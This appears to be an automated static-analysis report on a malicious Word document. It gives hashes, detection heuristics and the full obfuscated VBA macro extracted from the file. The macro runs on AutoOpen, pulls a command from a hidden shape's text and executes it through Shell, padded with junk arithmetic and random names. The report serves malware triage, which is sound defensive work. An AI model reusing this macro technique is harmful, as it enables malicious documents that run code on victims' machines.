Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 022411990c7ff9f4…

MALICIOUS

Office (OLE)

Size: 89.6 KB
Created: 2018-12-07 15:57:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 774622bcd1ce99fb6c3f5777aea226e9
SHA-1: 0c4cd96f51f9e93377651708f92746ffdb33ebef
SHA-256: 022411990c7ff9f424ac6ddf6d0e4ecc0a83eebfd2e769b21330f2cc3e67325b
Risk Score: 252

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6776113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6776113-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
    Shell(miTwSZLziIK, MNlzCRaIX), rKqisosC)
             Set GsDcaLPGpmKjjFZoNXcia = AunVimQGhSwPSmNptiholslX
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    aOTjKd
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography, found in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml, found in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6323 bytes
SHA-256: 3796612eec43830c5437a80aa2c0f12c0cbf4b334a8ee7a92dbd53812ca1fbf6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
158 of 198 identifiers look randomly generated (e.g. 'AunVimQGhSwPSmNptiholslX') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QfAMfBnnwmX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
aOTjKd
End Sub

Attribute VB_Name = "pztohzXbksLB"
Function aOTjKd()
On Error Resume Next
         Set itlLvlMXPDhSRhQz = ufZDwArGIimiXhwQAAC
      TkfwDLZWiMrivWY = BIfsuEnCatsWiCQ
      OqGJAdznbUcwrDjAJtOs = JPOzdVKTDocwLUEQOF / CLng(161164363) * 60670902 / Tan(291604252) + ZbrLXKrMpnYLEbrMW - Cos(49057126) + (272432589 / Int(YjAAfjijuoqicspnFR))
         Set OlKUTXwqiQDsVudI = jJLPPzUfwZvYaiMorsTw
      YKiVtQPIowcQkXplzw = qoVwDRIlrDdBKJJHzdtVjE
      JbTHpGWDutjHjCMfDl = YEKwRHaQqHDdDlRLXkKS / CLng(204150530) * 142285247 / Tan(2032754) + IdCdEnzpkEjTzfBAOqfvr - Cos(108852921) + (188688898 / Int(OrpvtSzCDbooEzLDKN))
         Set izFIQbtbjoAVNmJOTNU = PziApNCuRQouaXihVd
      vkphqwqVcBzfVcPI = PFSDYwJTzGvqDcsqAYmaQ
      DzrZtUkSRKOzRQKJWmfOqqv = YZFpUEchUXCTMzFpihok / CLng(184199360) * 41852427 / Tan(69090485) + frBAuBAMEMAUPvzNijct - Cos(91076049) + (287587974 / Int(XhqfJCKCSOcJdDbmSXpPzwlZ))
         Set fnBQQwATtqLzEXndR = lBtHYQlkwLNrsHHIQdrJL
      HVEXKlVkvTNzjoXY = lifwpGCwEpvHJmIWa
      XCAFzPNPtduXTlrOFifNROC = GwZclhFbItzWOfiQkZN / CLng(163979562) * 26309004 / Tan(214333278) + KQvjirMdIAbzDpldLY - Cos(126666610) + (96669875 / Int(lVAZzOdrBdVZaOMqAaj))
         Set vuwHMfkzfFzzaIqCB = nivjMFnFpGtWSzlGrQAbGiJz
      oboDmJZiIqKVOhrTGpdFI = zOTQaCZsJVwzYdzBDwUnKJ
      kdjJHzpfuaBdajWjXIP = pZQINUFljlUcooinqtStT / CLng(273538000) * 10811699 / Tan(155423203) + AYRhNwiubkLMavnuDw - Cos(60194019) + (34956591 / Int(pmBisiqWNAYtlNvnETo))
         Set BwWHuSSDujVmaUhNCRHbR = PttkoFQVDlkiOdUdLzE
      rkkZChQzAzWUUajcOJdN = YfkBrFEsYGIWlkfITiHoQU
      OQOnwrPBVrrSEzY = bMGcrNziqBUubWYW / CLng(25126472) * 169317642 / Tan(142821067) + dSHAJEnfuRaIvXjcJsNBS - Cos(206935513) + (326813105 / Int(XUawSUOiinhJEGSnaSoYbLw))
         Set tYqARKNCkvlEDwjZNtMcJCQ = uNXYpiWPbLPLHGkXBLz
      AEaqcNHXzsjqIRF = moMGZWdrjXRGJp
      zEIYqnjwbXwPicZDpAf = NwridaiKEwANKRmlztPRF / CLng(286620105) * 245525301 / Tan(234844402) + HuPHTcFiENwNZuPEWrf - Cos(149445896) + (242335143 / Int(RqnEvlOfWNHIWj))
         Set nsSLYDJjDnqslcBRb = sDfhjsjzNfdQsAA
      XiizHXcTFjPFmZIhr = OYjFIafbqdGnuqsUEXmd
      VbMcAcaLnXvYPm = hRVESfhwMSoZNRVlvNc / CLng(297950639) * 321579641 / Tan(151312378) + HzEQCGKOiDPmmBiLUncz - Cos(65973421) + (78515872 / Int(MtRmzLmsfKoNGN))
Set wNLLUSzUM = QfAMfBnnwmX.Shapes(odoMZCv + "OXRjQsRwqhR" + HpXXDZa).TextFrame
         Set NwOQjizzlQojpVvoEfBjQlP = SiZFJmPFzoRYjGQiRvFAA
      OKUizVSzibjfzB = upwAjiADXIwOTOU
      OiOPPkbnunwKqpAJOaXF = ARVOGzZAGzkJvUz / CLng(226561377) * 250102883 / Tan(295969063) + OKFwkpNiIpztrPZO - Cos(112991823) + (300673657 / Int(InBnnnNBuUCach))
         Set jiJUrFbzhFoNwM = wuitulwlaSKYPaKBtciJc
      slkiToOHjAMUVaUhfQlzjBj = LWXEvlNCGFBsILSKWTmJ
      vFkhLwRYiJrEDXwQ = MvnJOPYbZUwaaPPX / CLng(138728387) * 108597043 / Tan(113704191) + XjowibwKnEnWtMGqWChpLF - Cos(251184077) + (185607994 / Int(zDtchiGfcmdHqfmTOo))
         Set ptcCofiIpwzShQCdt = MKCFPwXDLEJkuipVDYitElow
      uUjuEjbpfOlNjijikTawFC = cMNizzubWDPUbrIHU
      vOTEITtwPTRNzksFDiqFc = knOJUJEmcLGRKnvYEtkBka / CLng(64343022) * 61536816 / Tan(26063133) + cWnaQOFFifqwzjucrFHi - Cos(169833984) + (34724123 / Int(fdzUbFJiEFohhzBu))
miTwSZLziIK = wNLLUSzUM.ContainingRange + uUlYtPRL + stWGj + kWNXSIW + NFOXMi + TwIcPXj + hVHXOWl + rdYcMOkZ + wjuOW
         Set bpuAmPfdFQpouuRWwXt = utbBwjnLRuLrIfJohmTVwO
      MAwTKMjjwLrhiOsBFbULKEw = PkcoKDXrjwOBBNdwlOPf
      zbapkNtcCjIBRDZjs = snzAjzrzswVawoTORJ / CLng(15756698) * 338633633 / Tan(171100743) + dPdPGzkJDOtsXrRwsbzkVu - Cos(42584110) + (181503661 / Int(TiCmQhsvCJkXUssOjvGhER))
         Set utswTijJIslKcFobJ = mGGEfdipZraMbEMqWGNunw
      SMzUQDHUzXRKmJpNPRdJsiv = jzmihNPCnPosjJNlS
      doJtajhswcKpwjQinT = ZmkIPXXVzjGEsrVFH / CLng(48913052) * 257932929 / Tan(153450802) + BpOmrwQEcwVuTtk - Cos(294877137) + (211212497 / Int(WCLjMsYRzdiJaAwLXzVWXYG))
         Set JWoouToMWUruzK = zLjGltcjjHRZQsdPQ
      HqwvqZcVpijauiqqmzfYmIh = IjctXUtFazrUPEVKiPDzwF
      mjZFjksIzIImKwjw = lizvnWaicVtWFjtDTq / CLng(65771726) * 331353483 / Tan(96087399) + ViqsLHRLNvRiMSFR - Cos(339732052) + (88413475 / Int(WEOwmuYOiqGZzGXIREuKTQRH))
         Set iwAcmviRJoltUmWzlWa = FwirtRMaHHMHjDXqGWubT
      bBijicsCviWlVkSJjV = IKBbiNROjsObzSjWdNKmj
      EMilvhnXznZrLLZZzWNOM = hDXTmNovYiAaFptt / CLng(118810040) * 232766080 / Tan(175673244) + vaBHGXzENoZUUuf - Cos(204021105) + (90713338 / Int(uaiBPrrkGjfGDinEOGB))
         Set zIzYTqCKOLQdzpRrSY = CwNzjAuIkKmWqOSXBYacEMTt
      dWvcRWRDTDVlJQ = ZhRAcpZOiRPSsvtqiU
      DiwjToUTXKwmsHCDXuTRODIR = BDYHZNrQNNsaBzLH / CLng(142979815) * 19000374 / Tan(24259485) + iXLprWvLDhAWhVSkwLzwF - Cos(142494372) + (201249263 / Int(KcVzHJsAEjjdsjPCSfNfNWt))
         Set NEwrqhwOKcBBukqfMjVvHE = pRFRHusJznITjnwbzz
      kUGWprNVpoGYjIjGal = rURTENmQGsPFWwnUz
      uPauZDUqPYKAjWpiIzSAB = DaGdaikbvokXfVq / CLng(322453627) * 311058506 / Tan(96625125) + OzNFGLsPnooBwhlLznvclFnc - Cos(148203906) + (105437786 / Int(qTsLDDBmLqVARhT))
Const MNlzCRaIX = 0
         Set niUvszrwBMczOzpdklhbJo = ajaFqUnHiWEslLdkwXj
      mqfULoSpftmjwDt = RuAiOEzcJGESGAjDc
      okAGtCCwbkkXthROSDXC = hsDKFkziiKiETPJOLBwbPdM / CLng(291817263) * 252622259 / Tan(83980804) + ArijjakHrzwoSCQzaB - Cos(126089053) + (174104504 / Int(IAHBZbfEjKXsNzqwi))
jHRRPNj = Array(zjmqTmE, raiHwEDLm, vEDZAwz, Interaction _
. _
Shell(miTwSZLziIK, MNlzCRaIX), rKqisosC)
         Set GsDcaLPGpmKjjFZoNXcia = AunVimQGhSwPSmNptiholslX
      HhwpiumGGsJoFccqjFr = TnmaXizzmNHJPubFTRDYJ
      LtEAoBFzCmtnGUu = RAzpUtlAYKBWXRCTaL / CLng(180299642) * 299050681 / Tan(145981025) + pwsoLVQcoHKzzDbUnS - Cos(54455171) + (28407782 / Int(dziZkjZNvsBzuKAzjhP))
         Set EnRGitidjCcNGSiQXszPErmO = BJGVitPFvVjqiOb
      iYUXEdPZGMXkksMACwdjcHBI = ILwzasiWTaTRqEXu
      OSWfVCIinilrUXWMLwSSZ = TsOQStjLrFpusjmhnInQ / CLng(253895093) * 71547799 / Tan(299302252) + wDwFfIFbHizdQEkPzcqf - Cos(12513952) + (169508600 / Int(mZiJJfIuIzjSOwdjjANm))
End Function